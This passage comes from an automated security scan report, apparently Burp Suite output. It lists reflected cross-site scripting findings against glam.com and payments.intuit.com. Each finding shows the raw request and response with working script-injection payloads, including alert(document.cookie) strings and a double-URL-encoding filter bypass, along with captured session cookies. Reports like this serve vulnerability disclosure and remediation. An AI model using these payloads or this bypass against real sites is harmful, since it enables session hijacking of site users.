User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: glam_sid=1126612978600458511; ctags=None; bkpix2=1

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/x-javascript
ETag: "d9a61c18c39e371e68f8ec954f2210fb:1300254528"
X-Glam-Bdata: XGlamBData,nbt,lda,ln
X-Glam-AdId: 5000025383
X-Glam-Euid: 7c58f7d28c0f13f55244ad8a36c43ef1
X-Powered-By: GlamAdapt/ASE/1.5
Vary: Accept-Encoding
Expires: Mon, 21 Mar 2011 16:42:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 21 Mar 2011 16:42:09 GMT
Connection: close
Content-Length: 10016

...[SNIP]...
12sa,g10001s;sz=300x250;tile=1;ord=6778163411654532;;afid=1621082087;dsid=1027200;url=zetcbm;seq=1;ux=f-f12sa,tid-1,pid-heurbg1oh7qpt9,aid-2,g-64,1,;_glt=300:1:11:42:25:539:2011:3:21;a_tz=-300;_g_cv=2;77751';alert(1)//57a9c84bae4;';
var vars = glam_affiliate_vars.split(";");
for (var i=0;i<vars.length;i++) {
var pair = vars[i].split("=");
if ( pair[1] ) { glam_info[pair[0]] = pair[1]; }
}
return ( glam_info[pName
...[SNIP]...

2.68. http://www35.glam.com/gad/glamadapt_jsrv.act [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www35.glam.com
Path:	/gad/glamadapt_jsrv.act

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e506'%3balert(1)//37dcc1e492c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6e506';alert(1)//37dcc1e492c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /gad/glamadapt_jsrv.act?;flg=64;;zone=/;nt=g;cc=us;aft=p;ec=ron;p=0;p=1;!c=fem;!c=nptr;!c=r;!c=s;!c=sf;ec=tfm;ec=tpa;pec=fm;rmt=exp;rtbp=1;vec=fm;vpec=fm;atf=1;uatf=s;pfl=0;dt=s;!c=hagl;!c=hagn;afid=1621082087;dsid=1027200;;tt=j;u=b0021heurbg1oh7qpt9,f0f12sa,g10001s;sz=300x250;tile=1;ord=6778163411654532;;afid=1621082087;dsid=1027200;url=zetcbm;seq=1;ux=f-f12sa,tid-1,pid-heurbg1oh7qpt9,aid-2,g-64,1,;_glt=300:1:11:42:25:539:2011:3:21;a_tz=-300;_g_cv=2;&6e506'%3balert(1)//37dcc1e492c=1 HTTP/1.1
Host: www35.glam.com
Proxy-Connection: keep-alive
Referer: http://www.highbeam.com/iframead/display.aspx?site=gale.hbr.doc&zone=p5554&kvps=page=wall;cat=hbr_99;pub=p5554;pos=r2;channel=1000000025;sz=300x250,300x600;tile=2;ord=19528853;&id=ad-r2c6cce%22%3balert(document.cookie)//c18ae8de3b0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: glam_sid=1126612978600458511; ctags=None; bkpix2=1

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/x-javascript
ETag: "d9a61c18c39e371e68f8ec954f2210fb:1300254528"
X-Glam-Bdata: XGlamBData,nbt,lda,ln
X-Glam-AdId: 5000025383
X-Glam-Euid: 3aa0a546ac04a62367c22044763fe628
X-Powered-By: GlamAdapt/ASE/1.5
Vary: Accept-Encoding
Expires: Mon, 21 Mar 2011 16:42:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 21 Mar 2011 16:42:15 GMT
Connection: close
Content-Length: 10026

...[SNIP]...
2sa,g10001s;sz=300x250;tile=1;ord=6778163411654532;;afid=1621082087;dsid=1027200;url=zetcbm;seq=1;ux=f-f12sa,tid-1,pid-heurbg1oh7qpt9,aid-2,g-64,1,;_glt=300:1:11:42:25:539:2011:3:21;a_tz=-300;_g_cv=2;;6e506';alert(1)//37dcc1e492c=1;';
var vars = glam_affiliate_vars.split(";");
for (var i=0;i<vars.length;i++) {
var pair = vars[i].split("=");
if ( pair[1] ) { glam_info[pair[0]] = pair[1]; }
}
return ( glam_info[pNa
...[SNIP]...

2.69. http://payments.intuit.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5deb3%2527%252dalert%25281%2529%252d%2527ae164b743d5 was submitted in the Referer HTTP header. This input was echoed as 5deb3'-alert(1)-'ae164b743d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET / HTTP/1.1
Host: payments.intuit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: INTUIT_SESSIONID=RELMgEwqF2E9P+VGkdp-iA**.g119-2; abTestId=0000000000002223720; abTestGroup=T2; abTestPriorityCode=0273400000; propertySegments=1300724387448%7CQB%3A1%3A%3A; s_cc=true; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300726205880%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; SurveyClosed=true; Survey_Tracker=TRUE; mbox=session#1300724385027-792520#1300726359|PC#1300724385027-792520.17#1303316499|check#true#1300724559; SHOPPER_USER_ID=2848631086
Referer: 5deb3%2527%252dalert%25281%2529%252d%2527ae164b743d5

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:21:37 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 05:58:38 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D938BD4E0A08058F1774D40DAF139FA7
x-wily-servlet: Clear appServerIp=10.8.5.143&agentName=app2&servletName=index_jsp&agentHost=esprdatg119&agentProcess=JBoss
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 108420


...[SNIP]...
<script>
                   // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = '5deb3'-alert(1)-'ae164b743d5';
                   </script>
...[SNIP]...

2.70. http://payments.intuit.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload b9588--><script>alert(1)</script>36da4f0cb8f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET / HTTP/1.1
Host: payments.intuit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: INTUIT_SESSIONID=RELMgEwqF2E9P+VGkdp-iA**.g119-2; abTestId=0000000000002223720; abTestGroup=T2; abTestPriorityCode=0273400000; propertySegments=1300724387448%7CQB%3A1%3A%3A; s_cc=true; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300726205880%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; SurveyClosed=true; Survey_Tracker=TRUE; mbox=session#1300724385027-792520#1300726359|PC#1300724385027-792520.17#1303316499|check#true#1300724559; SHOPPER_USER_ID=2848631086
Referer: http://www.google.com/search?hl=en&q=b9588--><script>alert(1)</script>36da4f0cb8f

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:21:39 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 05:58:40 GMT; Path=/
Set-Cookie: priorityCode=4899600000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D938C4260A08058F1774D40DE881A3BE
x-wily-servlet: Clear appServerIp=10.8.5.143&agentName=app2&servletName=index_jsp&agentHost=esprdatg119&agentProcess=JBoss
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 108511

...[SNIP]...
<script>alert(1)</script>36da4f0cb8f | -->
...[SNIP]...

2.71. http://payments.intuit.com/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ea6a'-alert(1)-'22e1363c582 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /?launchHelpMeChoose=true HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=1ea6a'-alert(1)-'22e1363c582

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:55:55 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=FZHR3jYkS+lzDwEbeMUcJw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:32:56 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D958225A0A0805192AA117E39659CAAC
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 108426


...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=1ea6a'-alert(1)-'22e1363c582';
                   </script>
...[SNIP]...

2.72. http://payments.intuit.com/apply-now/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/apply-now/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11fdb'-alert(1)-'203a332f69f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /apply-now/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=11fdb'-alert(1)-'203a332f69f

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:39 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=xA8xNwxVexVzMS2lpmfgzg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:40 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D96022AC0A0805192AA117E3CA858BCC
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 128360


...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=11fdb'-alert(1)-'203a332f69f';
                   </script>
...[SNIP]...

2.73. http://payments.intuit.com/apply-now/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/apply-now/

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 38475--><script>alert(1)</script>4d6c73c632 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:54 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=+mJdpJukVkdDu-nhiluhMA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:55 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9605E300A0805192AA117E31E12C9D2
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 128389

...[SNIP]...
<script>alert(1)</script>4d6c73c632 | -->
...[SNIP]...

2.74. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/apply-now/check-warranty-apply-now.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74fca'-alert(1)-'5c9bded9b65 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /apply-now/check-warranty-apply-now.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=74fca'-alert(1)-'5c9bded9b65

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:01:19 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=tTq9ajC5PZElam4-oVcSCw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:38:20 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95D170C0A0805192AA117E3237716BD
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dwarranty_002dapply_002dnow_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 161385


...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=74fca'-alert(1)-'5c9bded9b65';
                   </script>
...[SNIP]...

2.75. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/apply-now/check-warranty-apply-now.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload a8e31--><script>alert(1)</script>c61fa29957 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:01:40 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=wS+X-3WZ22Sb1ieL6oQWjQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:38:41 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95D675E0A0805192AA117E370ACEEA8
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dwarranty_002dapply_002dnow_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 161415

...[SNIP]...
<script>alert(1)</script>c61fa29957 | -->
...[SNIP]...

2.76. http://payments.intuit.com/apply-now/contact-me.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/apply-now/contact-me.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a2b9'-alert(1)-'7fe9fab8e6e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

